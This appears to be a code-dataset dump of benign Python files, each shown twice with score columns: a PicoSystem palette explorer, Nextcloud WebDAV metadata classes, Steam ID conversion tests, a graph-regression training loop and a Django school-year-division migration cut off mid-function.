            sx -= 1
            sx = max(0, sx)
            blip.play(1800, 10, 100)
        if button(RIGHT):
            sx += 1
            sx = min(63, sx)
            blip.play(1800, 10, 100)
    # update our selected colour from the new cursor position
    sliders[0][1], sliders[1][1], sliders[2][1] = colour_from_xy(sx, sy)
def draw_rgb_palette(x, y):
    """Blit the pre-rendered palette buffer at (x, y) and overlay the cursor."""
    blit(picker, 0, 0, 68, 68, x, y)
    # calculate a brightness for the cursor that pulses over time
    cursor_pulse = int((math.sin(time.ticks_ms() / 100.0) + 1.0) * 7.5)
    pen(cursor_pulse, cursor_pulse, cursor_pulse)
    # draw cursor: four 3px crosshair arms around the selected cell
    # (the +2 offsets skip the palette border)
    hline(sx - 5 + x + 2, sy + y + 2, 3)
    hline(sx + 2 + x + 2, sy + y + 2, 3)
    vline(sx + x + 2, sy - 5 + y + 2, 3)
    vline(sx + x + 2, sy + 2 + y + 2, 3)
def prepare_rgb_palette():
    """Render the full 64x64 palette (plus border) into the offscreen buffer."""
    target(picker)
    blend(COPY)
    # clear to black
    pen(0, 0, 0)
    clear()
    # draw outline
    pen(8, 8, 8)
    rect(0, 0, 68, 68)
    # draw the full palette grid of 64 x 64 pixels, this covers every single
    # colour in the picosystem 4096 colour (4 bits per channel) palette.
    for py in range(64):
        for px in range(64):
            r, g, b = colour_from_xy(px, py)
            pen(r, g, b)
            pixel(px + 2, py + 2)
    # restore drawing to the screen with normal alpha blending
    target()
    blend(ALPHA)
def draw_slider(slider, x, y):
    """Draw one channel slider: outline box plus a fill proportional to value."""
    width, height = 10, 68
    # outline in the channel's colour
    pen(slider[2])
    rect(x, y, width, height)
    # fill grows upward from the bottom, inset 2px inside the outline,
    # scaled to the 0..15 channel value
    fill_h = int(((height - 4) * slider[1]) / 15)
    frect(x + 2, y + height - fill_h - 2, width - 4, fill_h)
def draw(tick):
    """Render one frame: title bar, palette, sliders, swatch and readout."""
    # clear the screen
    pen(1, 1, 1)
    clear()
    # draw title
    pen(15, 15, 15)
    frect(0, 0, 120, 11)
    pen(1, 1, 1)
    text("Palette Explorer", 2, 2)
    # draw full palette
    draw_rgb_palette(5, 18)
    # draw r, g, b value sliders
    draw_slider(sliders[0], 80, 18)
    draw_slider(sliders[1], 92, 18)
    draw_slider(sliders[2], 104, 18)
    # draw selected colour swatch
    pen(8, 8, 8)
    rect(80, 92, 34, 23)
    col = rgb(sliders[0][1], sliders[1][1], sliders[2][1])
    pen(col)
    frect(82, 94, 30, 19)
    # draw pen() call and constant value
    pen(13, 13, 13)
    pen_call = f"pen({sliders[0][1]}, {sliders[1][1]}, {sliders[2][1]})"
    text(pen_call, 5, 92)
    text(f"col = 0x{col:04x}", 5, 107)
# render the palette buffer once at startup
prepare_rgb_palette()
start() | 0.477311 | 0.479686 |
from waterbutler.core import metadata
class BaseNextcloudMetadata(metadata.BaseMetadata):
    """Common WebDAV-derived metadata for Nextcloud files and folders.

    ``attributes`` is the dict of DAV properties parsed from a PROPFIND
    response, keyed by Clark-notation names such as ``{DAV:}getetag``.
    """
    def __init__(self, href, folder, provider, attributes=None):
        super(BaseNextcloudMetadata, self).__init__(None)
        self.attributes = attributes or {}
        self._folder = folder
        self._href = href
        self._provider = provider
    @property
    def provider(self):
        # provider name string
        return self._provider
    @property
    def name(self):
        # last path segment of the href
        return self._href.strip('/').split('/')[-1]
    @property
    def path(self):
        # href made relative to the configured folder root
        # NOTE(review): assumes self._href starts with self._folder — confirm.
        path = self._href[len(self._folder) - 1:]
        return path
    @property
    def size(self):
        # content length in bytes as a string, or None if not reported
        if '{DAV:}getcontentlength' in self.attributes:
            return str(int(self.attributes['{DAV:}getcontentlength']))
        return None
    @property
    def etag(self):
        # entity tag as reported (usually includes surrounding quotes)
        if '{DAV:}getetag' in self.attributes:
            return str(self.attributes['{DAV:}getetag'])
        return None
    @property
    def etag_noquote(self):
        # etag with surrounding double quotes stripped
        if self.etag:
            return self.etag.strip('"')
        return None
    @property
    def modified(self):
        # raw {DAV:}getlastmodified value, or None
        if '{DAV:}getlastmodified' in self.attributes:
            return self.attributes['{DAV:}getlastmodified']
        return None
    @property
    def created_utc(self):
        # creation time is not available from the DAV response
        return None
class NextcloudFileMetadata(BaseNextcloudMetadata, metadata.BaseFileMetadata):
    """File metadata; ``extra`` carries provider-scoped content hashes."""
    def __init__(self, href, folder, provider, attributes=None):
        super().__init__(href, folder, provider, attributes=attributes)
        # populated later via the `extra` setter (e.g. {'hashes': {...}})
        self._extra = {}
    @property
    def content_type(self):
        # MIME type reported by the server, or None
        if '{DAV:}getcontenttype' in self.attributes:
            return str(self.attributes['{DAV:}getcontenttype'])
        return None
    @property
    def fileid(self):
        # Nextcloud/ownCloud-specific stable file id, or None
        if '{http://owncloud.org/ns}fileid' in self.attributes:
            return str(self.attributes['{http://owncloud.org/ns}fileid'])
        return None
    @property
    def extra(self):
        # hashes are namespaced under the provider name
        return {
            'hashes': {
                self.provider: self._extra.get('hashes', {}),
            },
        }
    @extra.setter
    def extra(self, data):
        self._extra = data
class NextcloudFolderMetadata(BaseNextcloudMetadata, metadata.BaseFolderMetadata):
    """Folder metadata; content type defaults to httpd/unix-directory."""
    @property
    def content_type(self):
        # fall back to the conventional WebDAV collection type
        return str(self.attributes.get('{DAV:}getcontenttype', 'httpd/unix-directory'))
class NextcloudFileRevisionMetadata(metadata.BaseFileRevisionMetadata):
    """Metadata for a single revision of a Nextcloud file."""
    def __init__(self, provider, version, metadata):
        self._provider = provider
        self._metadata = metadata
        self._version = version
        self._modified = self._metadata.modified
        # hashes are namespaced by provider in the file metadata's extra
        self._md5 = metadata.extra['hashes'][self.provider].get('md5')
        self._sha256 = metadata.extra['hashes'][self.provider].get('sha256')
    @classmethod
    def from_metadata(cls, provider, revision, metadata):
        # alternate constructor used by the provider's revision listing
        return NextcloudFileRevisionMetadata(provider, revision, metadata)
    @property
    def provider(self):
        return self._provider
    @property
    def version_identifier(self):
        return 'revision'
    @property
    def version(self):
        return self._version
    @property
    def modified(self):
        return self._modified
    @property
    def extra(self):
        # only include hashes that are actually present
        hashes = {}
        if self._md5:
            hashes['md5'] = self._md5
        # BUG FIX: this branch previously tested self._md5 again, which
        # dropped sha256 when md5 was absent and emitted sha256=None when
        # only md5 was present.
        if self._sha256:
            hashes['sha256'] = self._sha256
return {'hashes': hashes} | waterbutler/providers/nextcloud/metadata.py | from waterbutler.core import metadata
class BaseNextcloudMetadata(metadata.BaseMetadata):
    """Common WebDAV-derived metadata for Nextcloud files and folders.

    ``attributes`` is the dict of DAV properties parsed from a PROPFIND
    response, keyed by Clark-notation names such as ``{DAV:}getetag``.
    """
    def __init__(self, href, folder, provider, attributes=None):
        super(BaseNextcloudMetadata, self).__init__(None)
        self.attributes = attributes or {}
        self._folder = folder
        self._href = href
        self._provider = provider
    @property
    def provider(self):
        # provider name string
        return self._provider
    @property
    def name(self):
        # last path segment of the href
        return self._href.strip('/').split('/')[-1]
    @property
    def path(self):
        # href made relative to the configured folder root
        # NOTE(review): assumes self._href starts with self._folder — confirm.
        path = self._href[len(self._folder) - 1:]
        return path
    @property
    def size(self):
        # content length in bytes as a string, or None if not reported
        if '{DAV:}getcontentlength' in self.attributes:
            return str(int(self.attributes['{DAV:}getcontentlength']))
        return None
    @property
    def etag(self):
        # entity tag as reported (usually includes surrounding quotes)
        if '{DAV:}getetag' in self.attributes:
            return str(self.attributes['{DAV:}getetag'])
        return None
    @property
    def etag_noquote(self):
        # etag with surrounding double quotes stripped
        if self.etag:
            return self.etag.strip('"')
        return None
    @property
    def modified(self):
        # raw {DAV:}getlastmodified value, or None
        if '{DAV:}getlastmodified' in self.attributes:
            return self.attributes['{DAV:}getlastmodified']
        return None
    @property
    def created_utc(self):
        # creation time is not available from the DAV response
        return None
class NextcloudFileMetadata(BaseNextcloudMetadata, metadata.BaseFileMetadata):
    """File metadata; ``extra`` carries provider-scoped content hashes."""
    def __init__(self, href, folder, provider, attributes=None):
        super().__init__(href, folder, provider, attributes=attributes)
        # populated later via the `extra` setter (e.g. {'hashes': {...}})
        self._extra = {}
    @property
    def content_type(self):
        # MIME type reported by the server, or None
        if '{DAV:}getcontenttype' in self.attributes:
            return str(self.attributes['{DAV:}getcontenttype'])
        return None
    @property
    def fileid(self):
        # Nextcloud/ownCloud-specific stable file id, or None
        if '{http://owncloud.org/ns}fileid' in self.attributes:
            return str(self.attributes['{http://owncloud.org/ns}fileid'])
        return None
    @property
    def extra(self):
        # hashes are namespaced under the provider name
        return {
            'hashes': {
                self.provider: self._extra.get('hashes', {}),
            },
        }
    @extra.setter
    def extra(self, data):
        self._extra = data
class NextcloudFolderMetadata(BaseNextcloudMetadata, metadata.BaseFolderMetadata):
    """Folder metadata; content type defaults to httpd/unix-directory."""
    @property
    def content_type(self):
        # fall back to the conventional WebDAV collection type
        return str(self.attributes.get('{DAV:}getcontenttype', 'httpd/unix-directory'))
class NextcloudFileRevisionMetadata(metadata.BaseFileRevisionMetadata):
    """Metadata for a single revision of a Nextcloud file."""
    def __init__(self, provider, version, metadata):
        self._provider = provider
        self._metadata = metadata
        self._version = version
        self._modified = self._metadata.modified
        # hashes are namespaced by provider in the file metadata's extra
        self._md5 = metadata.extra['hashes'][self.provider].get('md5')
        self._sha256 = metadata.extra['hashes'][self.provider].get('sha256')
    @classmethod
    def from_metadata(cls, provider, revision, metadata):
        # alternate constructor used by the provider's revision listing
        return NextcloudFileRevisionMetadata(provider, revision, metadata)
    @property
    def provider(self):
        return self._provider
    @property
    def version_identifier(self):
        return 'revision'
    @property
    def version(self):
        return self._version
    @property
    def modified(self):
        return self._modified
    @property
    def extra(self):
        # only include hashes that are actually present
        hashes = {}
        if self._md5:
            hashes['md5'] = self._md5
        # BUG FIX: this branch previously tested self._md5 again, which
        # dropped sha256 when md5 was absent and emitted sha256=None when
        # only md5 was present.
        if self._sha256:
            hashes['sha256'] = self._sha256
return {'hashes': hashes} | 0.776284 | 0.099339 |
from app.steam.id import (is_valid_steamid,
is_steamid,
is_steamid64,
is_steamid3,
steamid_to_steamid64,
steamid64_to_steamid,
steamid64_to_steamid3,
steamid3_to_steamid,
SteamID)
# Three equivalent representations of the same account, in order:
# [steamid64, classic STEAM_X:Y:Z steamid, SteamID3].
steamids_a = ['76561197960359452', 'STEAM_0:0:46862', '[U:1:93724]']
steamids_b = ['76561198066693739', 'STEAM_0:1:53214005', '[U:1:106428011]']
def test_valid_steamid():
    """Every representation of both accounts validates."""
    for steamid in steamids_a + steamids_b:
        assert is_valid_steamid(steamid)
def test_is_steamid():
    """Index 1 holds the classic STEAM_X:Y:Z form."""
    assert is_steamid(steamids_a[1])
    assert is_steamid(steamids_b[1])
def test_is_steamid64():
    """Index 0 holds the 64-bit form."""
    assert is_steamid64(steamids_a[0])
    assert is_steamid64(steamids_b[0])
def test_is_steamid3():
    """Index 2 holds the [U:1:N] (SteamID3) form."""
    assert is_steamid3(steamids_a[2])
    assert is_steamid3(steamids_b[2])
def test_convert_steamid_to_steamid64():
    """Classic form converts to the 64-bit form."""
    steamid_a, steamid_b = steamids_a[1], steamids_b[1]
    assert steamid_to_steamid64(steamid_a) == steamids_a[0]
    assert steamid_to_steamid64(steamid_b) == steamids_b[0]
def test_convert_steamid64_to_steamid():
    """64-bit form converts back to the classic form."""
    steamid64_a, steamid64_b = steamids_a[0], steamids_b[0]
    assert steamid64_to_steamid(steamid64_a) == steamids_a[1]
    assert steamid64_to_steamid(steamid64_b) == steamids_b[1]
def test_convert_steamid64_to_steamid3():
    """64-bit form converts to the SteamID3 form."""
    steamid64_a, steamid64_b = steamids_a[0], steamids_b[0]
    assert steamid64_to_steamid3(steamid64_a) == steamids_a[2]
    assert steamid64_to_steamid3(steamid64_b) == steamids_b[2]
def test_convert_steamid3_to_steamid():
    """SteamID3 form converts to the classic form."""
    steamid3_a, steamid3_b = steamids_a[2], steamids_b[2]
    assert steamid3_to_steamid(steamid3_a) == steamids_a[1]
    assert steamid3_to_steamid(steamid3_b) == steamids_b[1]
def test_steamid_from_steamid():
    """SteamID built from the classic form exposes all three forms."""
    steamid_a, steamid_b = steamids_a[1], steamids_b[1]
    a = SteamID(steamid_a)
    b = SteamID(steamid_b)
    assert a.steamid == steamids_a[1]
    assert a.steamid64 == steamids_a[0]
    assert a.steamid3 == steamids_a[2]
    assert b.steamid == steamids_b[1]
    assert b.steamid64 == steamids_b[0]
    assert b.steamid3 == steamids_b[2]
def test_steamid_from_steamid64():
    """SteamID built from the 64-bit form exposes all three forms."""
    steamid_a, steamid_b = steamids_a[0], steamids_b[0]
    a = SteamID(steamid_a)
    b = SteamID(steamid_b)
    assert a.steamid == steamids_a[1]
    assert a.steamid64 == steamids_a[0]
    assert a.steamid3 == steamids_a[2]
    assert b.steamid == steamids_b[1]
    assert b.steamid64 == steamids_b[0]
    assert b.steamid3 == steamids_b[2]
def test_steamid_from_steamid3():
    """SteamID built from the SteamID3 form exposes all three forms."""
    steamid_a, steamid_b = steamids_a[2], steamids_b[2]
    a = SteamID(steamid_a)
    b = SteamID(steamid_b)
    assert a.steamid == steamids_a[1]
    assert a.steamid64 == steamids_a[0]
    assert a.steamid3 == steamids_a[2]
    assert b.steamid == steamids_b[1]
    assert b.steamid64 == steamids_b[0]
assert b.steamid3 == steamids_b[2] | tests/test_steam_ids.py | from app.steam.id import (is_valid_steamid,
is_steamid,
is_steamid64,
is_steamid3,
steamid_to_steamid64,
steamid64_to_steamid,
steamid64_to_steamid3,
steamid3_to_steamid,
SteamID)
# Three equivalent representations of the same account, in order:
# [steamid64, classic STEAM_X:Y:Z steamid, SteamID3].
steamids_a = ['76561197960359452', 'STEAM_0:0:46862', '[U:1:93724]']
steamids_b = ['76561198066693739', 'STEAM_0:1:53214005', '[U:1:106428011]']
def test_valid_steamid():
    """Every representation of both accounts validates."""
    for steamid in steamids_a + steamids_b:
        assert is_valid_steamid(steamid)
def test_is_steamid():
    """Index 1 holds the classic STEAM_X:Y:Z form."""
    assert is_steamid(steamids_a[1])
    assert is_steamid(steamids_b[1])
def test_is_steamid64():
    """Index 0 holds the 64-bit form."""
    assert is_steamid64(steamids_a[0])
    assert is_steamid64(steamids_b[0])
def test_is_steamid3():
    """Index 2 holds the [U:1:N] (SteamID3) form."""
    assert is_steamid3(steamids_a[2])
    assert is_steamid3(steamids_b[2])
def test_convert_steamid_to_steamid64():
    """Classic form converts to the 64-bit form."""
    steamid_a, steamid_b = steamids_a[1], steamids_b[1]
    assert steamid_to_steamid64(steamid_a) == steamids_a[0]
    assert steamid_to_steamid64(steamid_b) == steamids_b[0]
def test_convert_steamid64_to_steamid():
    """64-bit form converts back to the classic form."""
    steamid64_a, steamid64_b = steamids_a[0], steamids_b[0]
    assert steamid64_to_steamid(steamid64_a) == steamids_a[1]
    assert steamid64_to_steamid(steamid64_b) == steamids_b[1]
def test_convert_steamid64_to_steamid3():
    """64-bit form converts to the SteamID3 form."""
    steamid64_a, steamid64_b = steamids_a[0], steamids_b[0]
    assert steamid64_to_steamid3(steamid64_a) == steamids_a[2]
    assert steamid64_to_steamid3(steamid64_b) == steamids_b[2]
def test_convert_steamid3_to_steamid():
    """SteamID3 form converts to the classic form."""
    steamid3_a, steamid3_b = steamids_a[2], steamids_b[2]
    assert steamid3_to_steamid(steamid3_a) == steamids_a[1]
    assert steamid3_to_steamid(steamid3_b) == steamids_b[1]
def test_steamid_from_steamid():
    """SteamID built from the classic form exposes all three forms."""
    steamid_a, steamid_b = steamids_a[1], steamids_b[1]
    a = SteamID(steamid_a)
    b = SteamID(steamid_b)
    assert a.steamid == steamids_a[1]
    assert a.steamid64 == steamids_a[0]
    assert a.steamid3 == steamids_a[2]
    assert b.steamid == steamids_b[1]
    assert b.steamid64 == steamids_b[0]
    assert b.steamid3 == steamids_b[2]
def test_steamid_from_steamid64():
    """SteamID built from the 64-bit form exposes all three forms."""
    steamid_a, steamid_b = steamids_a[0], steamids_b[0]
    a = SteamID(steamid_a)
    b = SteamID(steamid_b)
    assert a.steamid == steamids_a[1]
    assert a.steamid64 == steamids_a[0]
    assert a.steamid3 == steamids_a[2]
    assert b.steamid == steamids_b[1]
    assert b.steamid64 == steamids_b[0]
    assert b.steamid3 == steamids_b[2]
def test_steamid_from_steamid3():
    """SteamID built from the SteamID3 form exposes all three forms."""
    steamid_a, steamid_b = steamids_a[2], steamids_b[2]
    a = SteamID(steamid_a)
    b = SteamID(steamid_b)
    assert a.steamid == steamids_a[1]
    assert a.steamid64 == steamids_a[0]
    assert a.steamid3 == steamids_a[2]
    assert b.steamid == steamids_b[1]
    assert b.steamid64 == steamids_b[0]
assert b.steamid3 == steamids_b[2] | 0.460289 | 0.610599 |
import torch
import torch.nn as nn
import math
from .metrics import MSE, MAE, MAPE
from graph_edit_distance import embedding_distances
def train_epoch(model, optimizer, device, data_loader, epoch):
    """Train `model` for one epoch over `data_loader`.

    Returns:
        (mean loss, [mean MSE, mean MAE, mean MAPE], optimizer)
    """
    model.train()
    epoch_loss = 0
    epoch_train_mse = 0
    epoch_train_mae = 0
    epoch_train_mape = 0
    nb_data = 0  # number of targets seen (not returned; kept for debugging)
    # NOTE: loop variable renamed from `iter` (shadowed the builtin);
    # unused `gpu_mem` local removed.
    for batch_idx, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
        batch_x = batch_graphs.ndata['feat'].to(device)  # num x feat
        batch_e = batch_graphs.edata['feat'].to(device)
        batch_snorm_e = batch_snorm_e.to(device)
        batch_targets = batch_targets.to(device)
        batch_snorm_n = batch_snorm_n.to(device)  # num x 1
        optimizer.zero_grad()
        batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
        loss = model.loss(batch_scores, batch_targets)
        loss.backward()
        optimizer.step()
        epoch_loss += loss.detach().item()
        mse = MSE(batch_scores, batch_targets, model.distance_function)
        mae = MAE(batch_scores, batch_targets, model.distance_function)
        mape = MAPE(batch_scores, batch_targets, model.distance_function)
        epoch_train_mse += mse
        epoch_train_mae += mae
        epoch_train_mape += mape
        #print("\ntrain ", batch_scores, batch_targets, mae)
        nb_data += batch_targets.size(0)
    # Averages over the number of batches (batch_idx holds the last index).
    epoch_loss /= (batch_idx + 1)
    epoch_train_mse /= (batch_idx + 1)
    epoch_train_mae /= (batch_idx + 1)
    epoch_train_mape /= (batch_idx + 1)
    return epoch_loss, [epoch_train_mse, epoch_train_mae, epoch_train_mape], optimizer
def evaluate_network(model, device, data_loader, epoch):
    """Evaluate `model` on `data_loader` without gradient tracking.

    Returns:
        (mean loss, [mean MSE, mean MAE, mean MAPE])
    """
    model.eval()
    epoch_test_loss = 0
    epoch_test_mse = 0
    epoch_test_mae = 0
    epoch_test_mape = 0
    nb_data = 0  # number of targets seen (not returned; kept for debugging)
    with torch.no_grad():
        # NOTE: loop variable renamed from `iter` (shadowed the builtin).
        for batch_idx, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
            batch_x = batch_graphs.ndata['feat'].to(device)
            batch_e = batch_graphs.edata['feat'].to(device)
            batch_snorm_e = batch_snorm_e.to(device)
            batch_targets = batch_targets.to(device)
            batch_snorm_n = batch_snorm_n.to(device)
            batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
            loss = model.loss(batch_scores, batch_targets)
            epoch_test_loss += loss.detach().item()
            mse = MSE(batch_scores, batch_targets, model.distance_function)
            mae = MAE(batch_scores, batch_targets, model.distance_function)
            mape = MAPE(batch_scores, batch_targets, model.distance_function)
            epoch_test_mse += mse
            epoch_test_mae += mae
            epoch_test_mape += mape
            #print("\nval ", batch_scores, batch_targets, mae)
            nb_data += batch_targets.size(0)
        # Averages over the number of batches (batch_idx holds the last index).
        epoch_test_loss /= (batch_idx + 1)
        epoch_test_mse /= (batch_idx + 1)
        epoch_test_mae /= (batch_idx + 1)
        epoch_test_mape /= (batch_idx + 1)
    return epoch_test_loss, [epoch_test_mse, epoch_test_mae, epoch_test_mape]
def get_predictions(model, device, data_loader, epoch):
    """Collect flat lists of ground-truth targets and predicted distances."""
    model.eval()
    targets = []
    scores = []
    with torch.no_grad():
        # NOTE(review): `iter` shadows the builtin here; harmless but worth renaming.
        for iter, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
            batch_x = batch_graphs.ndata['feat'].to(device)
            batch_e = batch_graphs.edata['feat'].to(device)
            batch_snorm_e = batch_snorm_e.to(device)
            batch_targets = batch_targets.to(device)
            batch_snorm_n = batch_snorm_n.to(device)
            batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
            targets += batch_targets.flatten().tolist()
            # distances between embeddings are the model's predictions
            scores += embedding_distances(batch_scores, model.distance_function).flatten().tolist()
return targets, scores | realworld_benchmark/train/train_molecules_graph_regression.py | import torch
import torch.nn as nn
import math
from .metrics import MSE, MAE, MAPE
from graph_edit_distance import embedding_distances
def train_epoch(model, optimizer, device, data_loader, epoch):
    """Train `model` for one epoch over `data_loader`.

    Returns:
        (mean loss, [mean MSE, mean MAE, mean MAPE], optimizer)
    """
    model.train()
    epoch_loss = 0
    epoch_train_mse = 0
    epoch_train_mae = 0
    epoch_train_mape = 0
    nb_data = 0  # number of targets seen (not returned; kept for debugging)
    # NOTE: loop variable renamed from `iter` (shadowed the builtin);
    # unused `gpu_mem` local removed.
    for batch_idx, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
        batch_x = batch_graphs.ndata['feat'].to(device)  # num x feat
        batch_e = batch_graphs.edata['feat'].to(device)
        batch_snorm_e = batch_snorm_e.to(device)
        batch_targets = batch_targets.to(device)
        batch_snorm_n = batch_snorm_n.to(device)  # num x 1
        optimizer.zero_grad()
        batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
        loss = model.loss(batch_scores, batch_targets)
        loss.backward()
        optimizer.step()
        epoch_loss += loss.detach().item()
        mse = MSE(batch_scores, batch_targets, model.distance_function)
        mae = MAE(batch_scores, batch_targets, model.distance_function)
        mape = MAPE(batch_scores, batch_targets, model.distance_function)
        epoch_train_mse += mse
        epoch_train_mae += mae
        epoch_train_mape += mape
        #print("\ntrain ", batch_scores, batch_targets, mae)
        nb_data += batch_targets.size(0)
    # Averages over the number of batches (batch_idx holds the last index).
    epoch_loss /= (batch_idx + 1)
    epoch_train_mse /= (batch_idx + 1)
    epoch_train_mae /= (batch_idx + 1)
    epoch_train_mape /= (batch_idx + 1)
    return epoch_loss, [epoch_train_mse, epoch_train_mae, epoch_train_mape], optimizer
def evaluate_network(model, device, data_loader, epoch):
    """Evaluate `model` on `data_loader` without gradient tracking.

    Returns:
        (mean loss, [mean MSE, mean MAE, mean MAPE])
    """
    model.eval()
    epoch_test_loss = 0
    epoch_test_mse = 0
    epoch_test_mae = 0
    epoch_test_mape = 0
    nb_data = 0  # number of targets seen (not returned; kept for debugging)
    with torch.no_grad():
        # NOTE: loop variable renamed from `iter` (shadowed the builtin).
        for batch_idx, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
            batch_x = batch_graphs.ndata['feat'].to(device)
            batch_e = batch_graphs.edata['feat'].to(device)
            batch_snorm_e = batch_snorm_e.to(device)
            batch_targets = batch_targets.to(device)
            batch_snorm_n = batch_snorm_n.to(device)
            batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
            loss = model.loss(batch_scores, batch_targets)
            epoch_test_loss += loss.detach().item()
            mse = MSE(batch_scores, batch_targets, model.distance_function)
            mae = MAE(batch_scores, batch_targets, model.distance_function)
            mape = MAPE(batch_scores, batch_targets, model.distance_function)
            epoch_test_mse += mse
            epoch_test_mae += mae
            epoch_test_mape += mape
            #print("\nval ", batch_scores, batch_targets, mae)
            nb_data += batch_targets.size(0)
        # Averages over the number of batches (batch_idx holds the last index).
        epoch_test_loss /= (batch_idx + 1)
        epoch_test_mse /= (batch_idx + 1)
        epoch_test_mae /= (batch_idx + 1)
        epoch_test_mape /= (batch_idx + 1)
    return epoch_test_loss, [epoch_test_mse, epoch_test_mae, epoch_test_mape]
def get_predictions(model, device, data_loader, epoch):
    """Collect flat lists of ground-truth targets and predicted distances."""
    model.eval()
    targets = []
    scores = []
    with torch.no_grad():
        # NOTE(review): `iter` shadows the builtin here; harmless but worth renaming.
        for iter, (batch_graphs, batch_targets, batch_snorm_n, batch_snorm_e) in enumerate(data_loader):
            batch_x = batch_graphs.ndata['feat'].to(device)
            batch_e = batch_graphs.edata['feat'].to(device)
            batch_snorm_e = batch_snorm_e.to(device)
            batch_targets = batch_targets.to(device)
            batch_snorm_n = batch_snorm_n.to(device)
            batch_scores = model.forward(batch_graphs, batch_x, batch_e, batch_snorm_n, batch_snorm_e)
            targets += batch_targets.flatten().tolist()
            # distances between embeddings are the model's predictions
            scores += embedding_distances(batch_scores, model.distance_function).flatten().tolist()
return targets, scores | 0.631594 | 0.510313 |
from itertools import count
from django.db import migrations, models
import django.db.models.deletion
def create_school_year_divisions(apps, schema_editor):
    """Data migration: create a SchoolYearDivision per distinct set of periods.

    Courses that share the exact same ordered set of period ids share one
    division. Periods are cloned onto the new division, and course discounts
    are re-pointed at the cloned periods (matched by old period id, falling
    back to period name). Original un-divisioned periods are deleted at the end.
    """
    Course = apps.get_model('leprikon', 'Course')
    CourseDiscount = apps.get_model('leprikon', 'CourseDiscount')
    SchoolYearDivision = apps.get_model('leprikon', 'SchoolYearDivision')
    SchoolYearPeriod = apps.get_model('leprikon', 'SchoolYearPeriod')
    # maps (period-id-set, old period id/name) -> cloned period id
    new_period_ids = {}
    new_period_ids_fuzzy = {}
    school_year_division_ids = {}
    for course in Course.objects.order_by('id').iterator():
        key = tuple(course.periods.order_by('id').values_list('id', flat=True))
        if key not in school_year_division_ids:
            # derive a division name from the course unit, adding a numeric
            # suffix until it is unique within the school year
            name = course.unit
            counter = count(2)
            while SchoolYearDivision.objects.filter(
                school_year_id=course.school_year_id,
                name=name,
            ).exists():
                name='{course_unit} {c}'.format(course_unit=course.unit, c=next(counter))
            school_year_division = SchoolYearDivision.objects.create(
                school_year_id=course.school_year_id,
                name=name,
                period_name=course.unit,
            )
            # clone each period onto the new division (saving with pk=None inserts)
            for period in course.periods.all():
                old_period_id = period.id
                period.id, period.pk = None, None
                period.school_year_division = school_year_division
                period.save()
                new_period_ids[(key, old_period_id)] = period.id
                new_period_ids_fuzzy[(key, period.name)] = period.id
            school_year_division_ids[key] = school_year_division.id
        course.school_year_division_id = school_year_division_ids[key]
        course.save()
        # fix discounts
        for discount in CourseDiscount.objects.filter(
            registration__subject_id=course.id
        ).select_related('period', 'registration'):
            old_period = discount.period
            discount.period = None
            discount.period_id = new_period_ids.get((key, old_period.id))
            if discount.period_id is None:
                # fall back to matching the cloned period by name
                discount.period_id = new_period_ids_fuzzy.get((key, old_period.name))
            discount.save()
    # delete original periods
    SchoolYearPeriod.objects.filter(school_year_division=None).delete()
class Migration(migrations.Migration):
    """Add SchoolYearDivision, link courses/periods to it, then migrate data."""
    dependencies = [
        ('leprikon', '0014_variable_symbol'),
    ]
    operations = [
        migrations.CreateModel(
            name='SchoolYearDivision',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=150, verbose_name='division name')),
                ('period_name', models.CharField(max_length=150, verbose_name='period name')),
                ('school_year', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='divisions', to='leprikon.SchoolYear', verbose_name='school year')),
            ],
            options={
                'ordering': ('name',),
                'verbose_name': 'school year division',
                'verbose_name_plural': 'school year divisions',
            },
        ),
        migrations.AlterUniqueTogether(
            name='schoolyeardivision',
            unique_together=set([('school_year', 'name')]),
        ),
        migrations.AddField(
            model_name='course',
            name='school_year_division',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='courses', to='leprikon.SchoolYearDivision', verbose_name='school year division'),
        ),
        migrations.AddField(
            model_name='schoolyearperiod',
            name='school_year_division',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='periods', to='leprikon.SchoolYearDivision', verbose_name='school year division'),
        ),
        # data migration defined above runs after the schema changes
        migrations.RunPython(create_school_year_divisions),
] | leprikon/migrations/0015_school_year_divisions.py |
from itertools import count
from django.db import migrations, models
import django.db.models.deletion
def create_school_year_divisions(apps, schema_editor):
    """Data migration: group each course's periods under a SchoolYearDivision.

    Courses that use the exact same set of periods (keyed by the sorted
    tuple of period ids) share one division.  The original periods are
    cloned under the new division, course discounts are re-pointed at the
    clones, and the now-orphaned original periods are deleted.
    """
    Course = apps.get_model('leprikon', 'Course')
    CourseDiscount = apps.get_model('leprikon', 'CourseDiscount')
    SchoolYearDivision = apps.get_model('leprikon', 'SchoolYearDivision')
    SchoolYearPeriod = apps.get_model('leprikon', 'SchoolYearPeriod')
    # (key, old period id) -> cloned period id
    new_period_ids = {}
    # (key, period name) -> cloned period id; fallback when the id lookup fails
    new_period_ids_fuzzy = {}
    # key (tuple of period ids) -> created division id
    school_year_division_ids = {}
    for course in Course.objects.order_by('id').iterator():
        key = tuple(course.periods.order_by('id').values_list('id', flat=True))
        if key not in school_year_division_ids:
            # pick a division name unique within the school year by
            # appending " 2", " 3", ... to the course unit name
            name = course.unit
            counter = count(2)
            while SchoolYearDivision.objects.filter(
                school_year_id=course.school_year_id,
                name=name,
            ).exists():
                name='{course_unit} {c}'.format(course_unit=course.unit, c=next(counter))
            school_year_division = SchoolYearDivision.objects.create(
                school_year_id=course.school_year_id,
                name=name,
                period_name=course.unit,
            )
            # clone each period under the new division; clearing id/pk
            # makes save() INSERT a fresh row instead of updating
